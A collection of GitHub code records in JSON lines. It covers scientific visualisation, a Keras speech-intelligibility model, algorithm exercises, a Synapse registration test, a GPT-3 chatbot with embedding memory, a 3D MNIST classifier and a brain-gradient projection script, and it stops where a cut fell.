match.group(0)\n        admixes = re.findall('[a-z]+?\\d?', lithology_admix)\n        for admix in admixes:\n            key = admix[0].lower()\n            admix = admix.upper()\n            if len(admix) == 1:\n                admix += 'X'\n            attrs[self.fieldnames.get(key, key)] = admix.upper()\n        return attrs\n\n","repo_name":"tomvansteijn/xsboringen","sub_path":"xsboringen/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"63"} +{"seq_id":"15137860978","text":"def OutputDataSetType():\n\n    return \"vtkUnstructuredGrid\"\n\n\ndef Script(time=\"2001-01-01\", coord_sys='GSM', coord_sys_view=None, Resolution=30, version=1):\n\n    import vtk\n\n    import magnetovis as mvs\n    from magnetovis import functions as mvsfunctions\n    if version == 1:\n        points, cells, logDensity = mvsfunctions.plasmasphere(N=Resolution)\n    else:\n        points, cells, logDensity = mvsfunctions.plasmasphere2(N=Resolution)\n\n    mvs.vtk.set_points(output, points)\n\n    mvs.vtk.set_arrays(output, point_data={'H+ log density [cm^-3]': logDensity})\n\n    output.Allocate(cells.shape[0], 1)\n    for row in range(cells.shape[0]):\n        aHexahedron = vtk.vtkHexahedron()\n        for col in range(cells.shape[1]):\n            aHexahedron.GetPointIds().SetId(col, cells[row, col])\n        output.InsertNextCell(aHexahedron.GetCellType(), aHexahedron.GetPointIds())\n\n    # The single transform has the effect of\n    # SM -> coord_sys_view (Native coordinate system to view 
coordinate system)\n # coord_sys_view -> coord_sys (View coordinate system to requested coordinate system)\n mvs._TransformByNames(in_name='SM', out_name=coord_sys, time=time, _output=output, _inputs=[output])\n\n\ndef DefaultRegistrationName(**kwargs):\n\n import magnetovis as mvs\n\n if kwargs['coord_sys'] == \"SM\":\n # Model is in SM and time independent so exclude time.\n return \"{}/{}\".format(\"GCC88 plasmasphere\", kwargs['coord_sys'])\n else:\n # Orientation depends on time, so include it.\n return \"{}/{}/{}\" \\\n .format(\"GCC88 plasmasphere\", mvs.util.trim_iso(kwargs['time']), kwargs['coord_sys'])\n\ndef GetPresentationDefaults():\n\n defaults = {\n 'display': {\n \"Representation\": \"Surface\",\n 'AmbientColor': [0.5, 0.5, 0.5],\n 'DiffuseColor': [0.5, 0.5, 0.5]\n },\n 'coloring': {\n 'colorBy': ('POINTS', 'H+ log density [cm^-3]'),\n 'scalarBar': {\n 'Title': r\"H$^{+}$ log density [cm$^{-3}$]\",\n 'ComponentTitle': '',\n 'HorizontalTitle': 0,\n 'Visibility': 1,\n 'ScalarBarLength': 0.8\n },\n 'colorTransferFunction': {\n 'AutomaticRescaleRangeMode': 1,\n 'AutomaticRescaleRangeMode': \"Grow and update on 'Apply'\",\n 'NumberOfTableValues': 16\n }\n }\n }\n\n return defaults\n\n","repo_name":"rweigel/magnetovis","sub_path":"magnetovis/Sources/Plasmasphere.py","file_name":"Plasmasphere.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"7367973600","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 20\n\n@author: jsalsman\n\"\"\"\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom keras.utils.np_utils import to_categorical\nfrom numpy import asarray\nfrom scipy.stats import rankdata\n\nlines = []\nwith open('featex-tran.txt', 'r') as f: # or, phrase-sliced.txt which has some\n # overlapping words so maybe rename\n # one of them if you want to use the\n # same server for the phrase as for\n # the 82 words\n lines.extend(f.readlines())\n\nX = [] # testing data independents\ny = [] # testing data dependents\nword = '' # word name\nmodel = {}\nn = 0\nlayers = 4\nunits = 32\nepochs = 1000\ndrop = 0.25\nfeatures = None\n\nfor line in lines + ['.']:\n tokens = line.strip().split()\n if line[0] != ' ': # new word\n if word != '': # not the first word\n print (\"word:\", word, n, \"transcripts,\", features, \"features\")\n\n y_cat = to_categorical(y)\n model[word].fit(X, y_cat, epochs=epochs, verbose=0)\n\n # now you can get the probability of intelligibility for some\n # featex vector Z this way:\n # pi = model[word].predict(asarray(Z).reshape(1, -1))[0][1]\n\n if line != '.': # not the last line\n word = tokens[2]\n features = int(tokens[4]) * int(tokens[6]) + int(tokens[8])\n X = []; y = []; n = 0\n\n model[word] = Sequential() # DNN\n model[word].add(Dense(units, input_dim=features,\n activation='softmax',\n kernel_initializer='glorot_uniform'))\n model[word].add(Dropout(drop))\n for i in range(layers):\n model[word].add(Dense(units,\n kernel_initializer='glorot_uniform'))\n model[word].add(Dropout(drop))\n model[word].add(Dense(2, activation='softmax',\n kernel_initializer='glorot_uniform'))\n model[word].compile(optimizer='adam',\n loss='categorical_crossentropy')\n\n else: # read a transcription's word data observation\n if len(tokens) > features + 1: # ignore incomplete recognition results\n fvec = []\n for i in range(features):\n fvec.append(float(tokens[i + 2]))\n if tokens[1] == \"<-\":\n 
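# rows flagged \"<-\" carry the intelligibility label in tokens[0]; keep them as observations\n                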
X.append(fvec)\n                y.append(float(tokens[0]))\n                n += 1\n\n\nbecause_00766t_2 = [0.22, 0.178, 0.929, 0.744, 0.05, 0.200, 0.381, 0.981,\n                    0.05, 0.182, 0.548, 0.000, 0.25, 0.161, 0.786, 0.512,\n                    0.43, 0.150, 0.929, 0.869, 0.725]\n# unintelligible, pronounced \"cuz\" without the \"bee-\"\n# 0.049262498\n\nbecause_01004t_5 = [0.08, 0.277, 1.000, 0.000, 0.09, 0.275, 0.976, 0.000,\n                    0.11, 0.261, 0.952, 0.988, 0.06, 0.198, 0.929, 1.000,\n                    0.05, 0.181, 0.333, 0.919, 0.569]\n# intelligible, pronounced \"because-ah\" as in a typical Chinese primary ESL student accent\n# 0.57494467\n\ndef perturb(V, word):\n    print(model[word].predict(asarray(V).reshape(1, -1))[0][1])\n    phonemes = (len(V) - 1) // 4\n    pbs = []\n    for n in range(phonemes):\n        Z = list(V)\n        Z[n*4 + 1] *= 1.5\n        Z[n*4 + 2] *= 1.5\n        Z[n*4 + 3] *= 1.5\n        p_i = model[word].predict(asarray(Z).reshape(1, -1))[0][1]\n        print(p_i)\n        pbs.append(p_i)\n    return [int(i) for i in rankdata(pbs)]\n\nmodel['because'].predict(asarray([because_00766t_2]).reshape(1, -1))[0][1]\n# 0.049262498\n\nmodel['because'].predict(asarray([because_01004t_5]).reshape(1, -1))[0][1]\n# 0.57494467\n\nperturb(because_00766t_2, 'because')\n","repo_name":"jsalsman/featex","sub_path":"example-for-fig3.py","file_name":"example-for-fig3.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"63"} +{"seq_id":"27786009636","text":"from time import perf_counter_ns as ns\n\n\ndef prod(arr):\n    p = 1\n    for n in arr:\n        p *= n\n    return p\n\n\ndef brute(arr):\n    ans = [prod([n for i, n in enumerate(arr) if i != j]) for j in range(len(arr))]\n    return ans\n\n\ndef div(arr): # doesn't work on large arr\n    return [prod(arr) / n for n in arr]\n\n\ndef no_div(arr, ans=None):\n    # a mutable default argument ([]) would be shared between calls and keep\n    # growing across the timing loop below; start from a fresh list each call\n    if ans is None:\n        ans = []\n    p = 1\n    for n in arr[::-1]:\n        ans.insert(0, p)\n        p *= n\n    p = 1\n    for i, n in enumerate(arr):\n        ans[i] *= p\n        p *= n\n    return ans\n\n\ntests = [\n    [1, 2, 3, 4, 5],\n    [3, 2, 1],\n]\n\nf = {'brute': [], 'div': [], 'no_div': []}\nfor n in tests:\n    start = ns()\n    brute(n)\n    end = ns()\n    f['brute'].append(end - start)\n    start = ns()\n    div(n)\n    end = ns()\n    f['div'].append(end - start)\n    start = ns()\n    no_div(n)\n    end = ns()\n    f['no_div'].append(end - start)\nprint(f'brute(): {f[\"brute\"]}, div(): {f[\"div\"]}, no_div(): {f[\"no_div\"]}')\n","repo_name":"e1630m/daily-coding-problem","sub_path":"py/p0002.py","file_name":"p0002.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"23954040004","text":"import json\nfrom unittest.mock import Mock\n\nfrom twisted.test.proto_helpers import MemoryReactorClock\n\nfrom synapse.rest.client.register import register_servlets\nfrom synapse.util import Clock\n\nfrom tests import unittest\n\n\nclass TermsTestCase(unittest.HomeserverTestCase):\n    servlets = [register_servlets]\n\n    def default_config(self):\n        config = super().default_config()\n        config.update(\n            {\n                \"public_baseurl\": \"https://example.org/\",\n                \"user_consent\": {\n                    \"version\": \"1.0\",\n                    \"policy_name\": \"My Cool Privacy Policy\",\n                    \"template_dir\": \"/\",\n                    \"require_at_registration\": True,\n                },\n            }\n        )\n        return config\n\n    def prepare(self, reactor, clock, hs):\n        self.clock = MemoryReactorClock()\n        self.hs_clock = Clock(self.clock)\n        self.url = \"/_matrix/client/r0/register\"\n        self.registration_handler = Mock()\n        self.auth_handler = Mock()\n        self.device_handler = Mock()\n\n    def test_ui_auth(self):\n        # Do a UI auth request\n        request_data = 
json.dumps({\"username\": \"kermit\", \"password\": \"monkey\"})\n channel = self.make_request(b\"POST\", self.url, request_data)\n\n self.assertEquals(channel.result[\"code\"], b\"401\", channel.result)\n\n self.assertTrue(channel.json_body is not None)\n self.assertIsInstance(channel.json_body[\"session\"], str)\n\n self.assertIsInstance(channel.json_body[\"flows\"], list)\n for flow in channel.json_body[\"flows\"]:\n self.assertIsInstance(flow[\"stages\"], list)\n self.assertTrue(len(flow[\"stages\"]) > 0)\n self.assertTrue(\"m.login.terms\" in flow[\"stages\"])\n\n expected_params = {\n \"m.login.terms\": {\n \"policies\": {\n \"privacy_policy\": {\n \"en\": {\n \"name\": \"My Cool Privacy Policy\",\n \"url\": \"https://example.org/_matrix/consent?v=1.0\",\n },\n \"version\": \"1.0\",\n }\n }\n }\n }\n self.assertIsInstance(channel.json_body[\"params\"], dict)\n self.assertDictContainsSubset(channel.json_body[\"params\"], expected_params)\n\n # We have to complete the dummy auth stage before completing the terms stage\n request_data = json.dumps(\n {\n \"username\": \"kermit\",\n \"password\": \"monkey\",\n \"auth\": {\n \"session\": channel.json_body[\"session\"],\n \"type\": \"m.login.dummy\",\n },\n }\n )\n\n self.registration_handler.check_username = Mock(return_value=True)\n\n channel = self.make_request(b\"POST\", self.url, request_data)\n\n # We don't bother checking that the response is correct - we'll leave that to\n # other tests. We just want to make sure we're on the right path.\n self.assertEquals(channel.result[\"code\"], b\"401\", channel.result)\n\n # Finish the UI auth for terms\n request_data = json.dumps(\n {\n \"username\": \"kermit\",\n \"password\": \"monkey\",\n \"auth\": {\n \"session\": channel.json_body[\"session\"],\n \"type\": \"m.login.terms\",\n },\n }\n )\n channel = self.make_request(b\"POST\", self.url, request_data)\n\n # We're interested in getting a response that looks like a successful\n # registration, not so much that the details are exactly what we want.\n\n self.assertEquals(channel.result[\"code\"], b\"200\", channel.result)\n\n self.assertTrue(channel.json_body is not None)\n self.assertIsInstance(channel.json_body[\"user_id\"], str)\n self.assertIsInstance(channel.json_body[\"access_token\"], str)\n self.assertIsInstance(channel.json_body[\"device_id\"], str)\n","repo_name":"ANSSI-FR/cry-me","sub_path":"cryme_server/src/synapse/sources/tests/test_terms_auth.py","file_name":"test_terms_auth.py","file_ext":"py","file_size_in_byte":4003,"program_lang":"python","lang":"en","doc_type":"code","stars":159,"dataset":"github-code","pt":"63"} +{"seq_id":"11108152288","text":"SCREEN_WIDTH = 1280\nSCREEN_HEIGHT = 640\nTILE_SIZE = 64\n\nOVERLAY_POSITIONS = {\n \"tool\" : (40, SCREEN_HEIGHT - 15),\n \"seed\" : (70, SCREEN_HEIGHT - 5)}\n\nLAYERS = {\n \"water\" : 0,\n \"ground\" : 1,\n \"soil\" : 2,\n \"soil water\" : 3,\n \"rain floor\" : 4,\n \"house bottom\" : 5,\n \"ground plant\" : 6,\n \"main\" : 7,\n \"house top\" : 8,\n \"fruit\" : 9,\n \"rain drops\" : 10\n}","repo_name":"izumi-0/pydew_valley","sub_path":"code/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"37141851239","text":"import sys\r\nsys.stdin = open(\"input.txt\", \"r\")\r\n\r\nINF = int(1e9)\r\n\r\n\r\ndef bellmanford(start):\r\n dist[start] = 0\r\n for i in range(N):\r\n for j in range(M):\r\n cur, nxt, cost = edges[j]\r\n if dist[cur] != INF and 
dist[nxt] > dist[cur] + cost:\r\n dist[nxt] = dist[cur] + cost\r\n if i == N-1:\r\n return True\r\n return False\r\n\r\nN, M = map(int, input().split())\r\ndist = [INF for _ in range(N+1)]\r\nedges = []\r\nfor _ in range(M):\r\n a, b, w = map(int, input().split())\r\n edges.append((a, b, w))\r\n\r\nneg_cycle = bellmanford(1)\r\n\r\nif neg_cycle is True:\r\n print(\"-1\")\r\nelse:\r\n for i in range(2, N+1):\r\n if dist[i] == INF:\r\n print(\"-1\")\r\n else:\r\n print(dist[i])\r\n","repo_name":"AlphaTechnic/Algorithm_Study","sub_path":"2021_winter_algorithm_study_basic/WEEK10_BELLMANFORD_AND_FLOYDWASHALL/11657.py","file_name":"11657.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"71970577162","text":"import os\nimport re\nimport json\nimport config\nimport openai\nimport numpy as np\nfrom numpy.linalg import norm\nfrom time import time,sleep\nfrom uuid import uuid4\nimport datetime\nopenai.api_key = config.OPENAI_API_KEY\n\ndef open_file(filepath):\n with open(filepath, 'r', encoding='utf-8') as f:\n return f.read()\n\ndef save_file(filepath, content):\n with open(filepath, 'w', encoding='utf-8') as f:\n f.write(content)\n\ndef load_json(filepath):\n with open(filepath, 'r', encoding='utf-8') as f:\n return json.load(f)\n\ndef save_json(filepath, payload):\n with open(filepath, 'w', encoding='utf-8') as f:\n json.dump(payload, f, ensure_ascii=False, sort_keys=True, indent=2)\n\ndef timestamp_to_datetime(unix_time):\n return datetime.datetime.fromtimestamp(unix_time).strftime(\"%A, %B %d, %Y at %I:%M%p %Z\")\n\ndef gpt3_embedding(content, engine='text-embedding-ada-002'):\n content = content.encode(encoding='utf-8', errors='ignore').decode()\n response = openai.Embedding.create(input=content, engine=engine)\n v = response['data'][0]['embedding']\n return v\n\ndef similarity(v1, v2):\n return np.dot(v1, v2) / (norm(v1) * norm(v2))\n\ndef get_memories(vector, logs, count):\n scores = []\n for log in logs:\n if vector == log['vector']:\n continue\n score = similarity(log['vector'], vector)\n log['score'] = score\n scores.append(log)\n ordered = sorted(scores, key=lambda d: d['score'], reverse=True)\n try:\n ordered = ordered[0:count]\n return ordered\n except:\n return ordered\n\ndef load_conversation():\n files = [f for f in os.listdir('conversations') if '.json' in f]\n result = []\n for file in files:\n data = load_json('conversations/%s' % file)\n result.append(data)\n ordered = sorted(result, key=lambda d: d['time'], reverse=False)\n return ordered\n\ndef summarize_memories(memories):\n memories = sorted(memories, key=lambda d: d['time'], reverse=True)\n block = '\\n\\n'.join([mem['message'] for mem in memories])\n identifiers = [mem['uuid'] for mem in memories]\n timestamps = [mem['time'] for mem in memories]\n prompt = open_file('prompt_notes.txt').replace('<>', block)\n notes = gpt3_completion(prompt)\n vector = gpt3_embedding(block)\n info = {'notes': notes, 'uuids': identifiers, 'times': timestamps, 'uuid': str(uuid4()),\n 'vector': vector, 'time': time()}\n filename = 'notes_%s.json' % time()\n save_json('local_notes/%s' % filename, info)\n return notes\n\ndef get_last_messages(conversation, limit):\n try:\n short = conversation[-limit:]\n except:\n short = conversation\n output = ''\n for i in short:\n output += '%s\\n\\n' % i['message']\n output = output.strip()\n return output\n\ndef gpt3_completion(prompt, engine='text-davinci-003', temp=0.0, top_p=1.0,\n tokens=500, 
freq_pen=0.0, pres_pen=0.0, stop=['USER:', 'JARVIS:']):\n max_retry = 5\n retry = 0\n prompt = prompt.encode(encoding='utf-8', errors='ignore').decode()\n\n while True:\n try:\n response = openai.Completion.create(\n engine=engine,\n prompt=prompt,\n temperature=temp,\n max_tokens=tokens,\n top_p=top_p,\n frequency_penalty=freq_pen,\n presence_penalty=pres_pen,\n stop=stop)\n text = response['choices'][0]['text'].strip()\n text = re.sub('[\\r\\n]+', '\\n', text)\n text = re.sub('[\\t ]+', ' ', text)\n filename = '%s_gpt3.txt' % time()\n save_file('logs/%s' % filename, prompt + '\\n\\n----------\\n\\n' + text)\n return text\n except Exception as fail:\n retry += 1\n if retry >= max_retry:\n return \"GPT-3 error: %s\" % fail\n print('Error communicating with OpenAI:', fail)\n sleep(1)\n\nif __name__ == '__main__':\n while True:\n a = input('\\n\\nUSER: ')\n timestamp = time()\n vector = gpt3_embedding(a)\n timestring = timestamp_to_datetime(timestamp)\n message = '%s: %s - %s' % ('USER', timestring, a)\n info = {'speaker': 'USER', 'time': timestamp, 'vector': vector, 'message': message, 'uuid': str(uuid4()), 'timestring': timestring}\n filename = 'log_%s_USER.json' % timestamp\n save_json('conversations/%s' % filename, info)\n\n conversation = load_conversation()\n memories = get_memories(vector, conversation, 10)\n notes = summarize_memories(memories)\n recent = get_last_messages(conversation, 4)\n\n prompt = open_file('prompt_response.txt').replace('<>', notes).replace('<>', recent)\n output = gpt3_completion(prompt)\n timestamp = time()\n vector = gpt3_embedding(output)\n timestring = timestamp_to_datetime(timestamp)\n message = '%s: %s - %s' % ('JARVIS', timestring, output)\n info = {'speaker': 'JARVIS', 'time': timestamp, 'vector': vector, 'message': message, 'uuid': str(uuid4()), 'timestring': timestring}\n filename = 'log_%s_JARVIS.json' % time()\n save_json('conversations/%s' % filename, info)\n\n print('\\n\\nJARVIS: %s' % output)\n","repo_name":"infoslack/gpt3-jarvis","sub_path":"chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":5270,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"31300244396","text":"import sys\nimport os\nimport shutil\nimport h5py\nimport numpy as np\nimport torch\nfrom torch.utils.tensorboard import SummaryWriter\nfrom utils.meters import AverageMeter\nfrom sklearn.model_selection import train_test_split\n\nfrom dataset import MNIST3dDataset, get_dataloaders\nfrom model import MNIST3dModel\n\napex_support = False\ntry:\n sys.path.append('./apex')\n from apex import amp\n apex_support = True\nexcept:\n print(\"Please install apex for mixed precision training from: https://github.com/NVIDIA/apex\")\n apex_support = False\n\ntorch.manual_seed(0)\n\n\ndef _save_config_file(model_checkpoints_folder):\n if not os.path.exists(model_checkpoints_folder):\n os.makedirs(model_checkpoints_folder)\n shutil.copy('./config.yaml', os.path.join(model_checkpoints_folder, 'config.yaml'))\n\n\nclass MNIST3dClassifier(object):\n\n def __init__(self, config):\n self.config = config\n self.device = self._get_device()\n self.writer = SummaryWriter()\n self.writer_val = SummaryWriter(f'{self.writer.log_dir}_val')\n self.train_loss_metric = AverageMeter()\n self.train_acc_metric = AverageMeter()\n self.val_loss_metric = AverageMeter()\n self.val_acc_metric = AverageMeter()\n\n\n def setup_data(self, path):\n with h5py.File(path, 'r') as hf:\n X_train = hf['X_train'][:]\n y_train = hf['y_train'][:]\n \n 
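# hold out 15% of the loaded training data for validation (test_size=0.15 below)\n        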
X_train, X_val, y_train, y_val = train_test_split(X_train, y_train, test_size=0.15,\n random_state=1, shuffle=True)\n train_loader = get_dataloaders(X_data=X_train, y_data=y_train,\n batch_size=self.config['batch_size'],\n num_workers=self.config['dataset']['num_workers'])\n val_loader = get_dataloaders(X_data=X_val, y_data=y_val,\n batch_size=self.config['batch_size'],\n num_workers=self.config['dataset']['num_workers'])\n return train_loader, val_loader\n\n\n def _get_device(self):\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n print(\"Running on:\", device)\n return device\n \n \n def _step(self, model, criterion, data, targets):\n output = model(data)\n targets = targets.view(-1)\n \n loss = criterion(output, targets.type(torch.cuda.LongTensor))\n\n _, predicted = torch.max(output.data, 1)\n\n acc = torch.mean((predicted == targets).type(torch.FloatTensor))\n \n return loss, acc\n \n \n def train(self):\n train_loader, val_loader = self.setup_data(self.config['dataset']['path'])\n\n model = MNIST3dModel(num_classes=self.config['dataset']['num_classes'])\n model.to(self.device)\n model = self._load_pre_trained_weights(model)\n\n learning_rate = 1e-3\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n criterion = torch.nn.CrossEntropyLoss()\n scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', factor=0.5, patience=3)\n\n if apex_support and self.config['fp16_precision']:\n model, optimizer = amp.initialize(model, optimizer,\n opt_level='O2',\n keep_batchnorm_fp32=True)\n\n model_checkpoints_folder = os.path.join(self.writer.log_dir, 'checkpoints')\n\n # save config file\n _save_config_file(model_checkpoints_folder)\n\n n_iter = 0\n best_valid_loss = np.inf\n\n for epoch_counter in range(1, self.config['epochs'] + 1):\n for data, targets in train_loader:\n optimizer.zero_grad()\n\n data = data.to(self.device)\n targets = targets.to(self.device)\n\n loss, acc = self._step(model, criterion, data, targets)\n\n self.train_loss_metric.update(loss.item())\n self.train_acc_metric.update(acc.item())\n \n if n_iter % self.config['log_every_n_steps'] == 0:\n self.writer.add_scalar('loss',\n self.train_loss_metric.avg,\n global_step=n_iter)\n self.writer.add_scalar('acc',\n self.train_acc_metric.avg,\n global_step=n_iter)\n print('[{}/{}] loss: {:.2f}, acc {:.2f}'.format(epoch_counter,\n self.config['epochs'],\n self.train_loss_metric.avg,\n self.train_acc_metric.avg))\n\n if apex_support and self.config['fp16_precision']:\n with amp.scale_loss(loss, optimizer) as scaled_loss:\n scaled_loss.backward()\n else:\n loss.backward()\n\n optimizer.step()\n n_iter += 1\n\n # validate the model if requested\n if epoch_counter % self.config['eval_every_n_epochs'] == 0:\n self.val_loss_metric.reset()\n self.val_acc_metric.reset()\n \n valid_loss, valid_acc = self._validate(model, criterion, val_loader)\n \n if valid_loss < best_valid_loss:\n # save the model weights\n best_valid_loss = valid_loss\n torch.save(model.state_dict(), os.path.join(model_checkpoints_folder, 'model.pth'))\n\n self.writer_val.add_scalar('loss',\n self.val_loss_metric.avg,\n global_step=n_iter)\n self.writer_val.add_scalar('acc',\n self.val_acc_metric.avg,\n global_step=n_iter)\n print('[{}/{}] val_loss: {:.2f}, val_acc {:.2f}'.format(epoch_counter,\n self.config['epochs'],\n self.val_loss_metric.avg,\n self.val_acc_metric.avg))\n\n scheduler.step(valid_loss)\n self.writer.add_scalar('lr_reduce_on_plateau',\n [group['lr'] for group in optimizer.param_groups][0],\n 
global_step=n_iter)\n\n\n def _validate(self, model, criterion, valid_loader):\n # validation steps\n with torch.no_grad():\n model.eval()\n\n valid_loss = 0.0\n valid_acc = 0.0\n counter = 0\n for data, targets in valid_loader:\n data = data.to(self.device)\n targets = targets.to(self.device)\n\n loss, acc = self._step(model, criterion, data, targets)\n valid_loss += loss.item()\n valid_acc += acc.item()\n self.val_loss_metric.update(loss.item())\n self.val_acc_metric.update(acc.item())\n counter += 1\n valid_loss /= counter\n valid_acc /= counter\n model.train()\n return valid_loss, valid_acc\n\n\n def _load_pre_trained_weights(self, model):\n try:\n checkpoints_folder = os.path.join('./runs', self.config['fine_tune_from'], 'checkpoints')\n state_dict = torch.load(os.path.join(checkpoints_folder, 'model.pth'))\n model.load_state_dict(state_dict)\n print(\"Loaded pre-trained model with success.\")\n except FileNotFoundError:\n print(\"Pre-trained weights not found. Training from scratch.\")\n\n return model\n\n\n def setup_test(self, path):\n with h5py.File(path, 'r') as hf:\n X_test = hf['X_test'][:]\n y_test = hf['y_test'][:]\n test_loader = get_dataloaders(X_data=X_test, y_data=y_test)\n return test_loader\n\n def test(self):\n test_loader = self.setup_test(self.config['dataset']['path'])\n \n model = MNIST3dModel(num_classes=self.config['dataset']['num_classes'])\n model.to(self.device)\n \n model_checkpoints_folder = os.path.join(self.writer.log_dir, 'checkpoints')\n state_dict = torch.load(os.path.join(model_checkpoints_folder, 'model.pth'))\n model.load_state_dict(state_dict)\n\n criterion = torch.nn.CrossEntropyLoss()\n\n with torch.no_grad():\n model.eval()\n\n test_acc = 0.0\n counter = 0\n for data, targets in test_loader:\n data = data.to(self.device)\n targets = targets.to(self.device)\n\n _, acc = self._step(model, criterion, data, targets)\n test_acc += acc.item()\n counter += 1\n test_acc /= counter\n\n print(f'\\n\\nTest accuracy: {test_acc:.2f}')\n","repo_name":"daptecc/3dmnist","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"18828078295","text":"import pandas as pd\nimport os\nimport glob\nimport io \nimport numpy as np\nimport matplotlib.pyplot as plt\nimport nibabel as nib\nimport seaborn as sns\nfrom scipy.stats import zscore\nfrom brainspace.utils.parcellation import reduce_by_labels, map_to_mask\nfrom brainspace.gradient import GradientMaps\nfrom brainspace.datasets import load_parcellation\nfrom brainspace.plotting import plot_hemispheres\nfrom brainspace.utils.parcellation import map_to_labels\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport dill\n\n\n\nlabeling = nib.load(snakemake.params.labels).get_fdata()\n#print(np.shape(labeling[1]))\nmask = ~np.isin(labeling[0],0)\n\nlabeling = labeling.astype(int)\n\n#labeling = np.squeeze(labeling).shape\n#print(np.shape(labeling))\n\n#df = pd.read_table('../participants.tsv')\n#subjects = df.participant_id.to_list() \n#subj = [ s.strip('sub-') for s in subjects ]\n\nsubj = snakemake.params.subjects\n\nnsubjects = len(subj)\n\ndef make_out_dir(out_path):\n\n\t#Make subdirectories to save files\n\tfilename = out_path\n\tif not os.path.exists(os.path.dirname(filename)):\n\t try:\n\t os.makedirs(os.path.dirname(filename))\n\t except OSError as exc: # Guard against race condition\n\t if exc.errno != errno.EEXIST:\n\t raise\n\n#projecting to cortex. 
Left and Right separately\n\ndef fill_array(mask_data,grad_array,low,up,roi):\n\n    sliced_array = grad_array[low:up]\n    mask_shape=np.shape(mask_data)\n    #print(np.shape(sliced_array))\n    q=0\n    for i in range(0,mask_shape[0]):\n        for j in range(0,mask_shape[1]):\n            for k in range(0,mask_shape[2]):\n                if mask_data[i,j,k] == roi:\n                    mask_data[i,j,k]= sliced_array[q]\n                    q=q+1\n\n    return mask_data\n\n\n\n\ndef get_sbctx_projections(grad_array,side,output_file):\n\n    if side =='R':\n        mask_data = nib.load(snakemake.params.str_rh).get_fdata()\n        img = nib.load(snakemake.params.str_rh)\n        mask_data = fill_array(mask_data,grad_array,0,1010,51)\n        mask_data = fill_array(mask_data,grad_array,1010,1765,50)\n        mask_data = fill_array(mask_data,grad_array,1765,1905,58)\n        final_img = nib.Nifti1Image(mask_data, img.affine, img.header)\n        nib.save(final_img,output_file)\n\n    if side =='L':\n        mask_data = nib.load(snakemake.params.str_lh).get_fdata()\n        img = nib.load(snakemake.params.str_lh)\n        mask_data = fill_array(mask_data,grad_array,0,1060,12)\n        mask_data = fill_array(mask_data,grad_array,1060,1788,11)\n        mask_data = fill_array(mask_data,grad_array,1788,1923,26)\n        final_img = nib.Nifti1Image(mask_data, img.affine, img.header)\n        nib.save(final_img,output_file)\n\n\n\n\n\n#emb_dir ='/home/dimuthu1/scratch/PPMI_project2/derivatives/analysis/smoothed/gradients/bs_emb'\n\n\n\ndef get_sbctx(sbctx_L,sbctx_R,sbctx_mean_L,sbctx_mean_R,grad):\n\n    aligned_emb_sbctx_R = dill.load(open(snakemake.input.aligned_grad_sbctx_R, \"rb\"))\n    aligned_emb_sbctx_L = dill.load(open(snakemake.input.aligned_grad_sbctx_L, \"rb\"))\n    mean_emb_sbctx_L= dill.load(open(snakemake.input.mean_grad_sbctx_L, \"rb\"))\n    mean_emb_sbctx_R= dill.load(open(snakemake.input.mean_grad_sbctx_R, \"rb\"))\n\n\n    for i, s in enumerate(subj):\n        emb_sbctx_L = aligned_emb_sbctx_L[:,grad,i] #projecting the selected gradient\n        emb_sbctx_R = aligned_emb_sbctx_R[:,grad,i] #projecting the selected gradient\n\n        get_sbctx_projections(emb_sbctx_L,'L',sbctx_L[i])\n        get_sbctx_projections(emb_sbctx_R,'R',sbctx_R[i])\n\n\n\n    emb_sbctx_L_mean = mean_emb_sbctx_L.gradients_[:,grad] #Mean gradient is passed as an object\n    emb_sbctx_R_mean = mean_emb_sbctx_R.gradients_[:,grad] #Mean gradient is passed as an object\n    #print(np.shape(emb_sbctx_R_12.gradients_))\n    get_sbctx_projections(emb_sbctx_L_mean,'L',sbctx_mean_L)\n    get_sbctx_projections(emb_sbctx_R_mean,'R',sbctx_mean_R)\n\n\n\nmake_out_dir(snakemake.params.out_path+'/sbctx/')\n#get_sbctx()\n\n\n\n#sorting file names for aligned gradients according to gradient number\ngrad1_L_list= [x for x in snakemake.output.sbctx_L if 'grad1' in x ]\ngrad2_L_list= [x for x in snakemake.output.sbctx_L if 'grad2' in x ]\ngrad3_L_list= [x for x in snakemake.output.sbctx_L if 'grad3' in x ]\n\ngrad1_R_list= [x for x in snakemake.output.sbctx_R if 'grad1' in x ]\ngrad2_R_list= [x for x in snakemake.output.sbctx_R if 'grad2' in x ]\ngrad3_R_list= [x for x in snakemake.output.sbctx_R if 'grad3' in x ]\n\n#sorting file names for mean gradients according to gradient number\nmean_grad1_L_list= [x for x in snakemake.output.sbctx_mean_L if 'grad1' in x ]\nmean_grad2_L_list= [x for x in snakemake.output.sbctx_mean_L if 'grad2' in x 
